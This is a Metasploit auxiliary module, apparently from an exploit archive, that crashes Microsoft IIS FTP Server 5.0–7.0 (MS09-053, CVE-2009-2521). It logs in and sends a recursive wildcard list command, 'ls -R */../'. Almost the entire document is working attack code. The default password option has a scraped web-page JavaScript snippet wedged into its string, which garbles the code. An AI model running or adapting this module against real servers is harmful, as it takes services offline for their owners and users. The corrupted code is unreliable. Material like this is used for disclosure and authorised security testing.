# Exploit Title: [MS09-053] Microsoft IIS FTP Server <= 7.0 Stack Exhaustion DoS
# Date: Jul 03, 2011
# Author: Myo Soe <YGN Ethical Hacker Group - http://yehg.net/>
# Software Link: http://www.microsoft.com/
# Version: 5.0 - 7.0
# Tested on: unpatched version of windows xp & 2k3
 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Auxiliary
 
    include Msf::Exploit::Remote::Ftp
    include Msf::Auxiliary::Dos
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Microsoft IIS FTP Server <= 7.0 LIST Stack Exhaustion Denial of Service',
            'Description'    => %q{
                This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. This exploit is especially meant for the service which is configured as "manual" mode in startup type.
            },
            'Author'         => [
                    'Nikolaos "Kingcope" Rangos',  # Bug Discoverer
                    'Myo Soe <YGN Ethical Hacker Group, http://yehg.net/>'  # Metasploit Module
                    ], 
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 1.0 $',
            'References'     =>
                [
                    [ 'CVE', '2009-2521'],
                    [ 'BID', '36273'],
                    [ 'OSVDB', '57753'],
                    [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],
                    [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']
 
                ],
            'DisclosureDate' => 'Sep 03 2009'))
 
        register_options([
            OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),
            OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'mozilla@example.com<script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</script>' ])
        ])
    end
 
    def run
     
        return unless connect_login
         
        print_status("Sending DoS packets ...")
         
        send_cmd_data(['ls','-R */../'],nil)   
         
        disconnect
         
        print_good("Done")
         
    end
end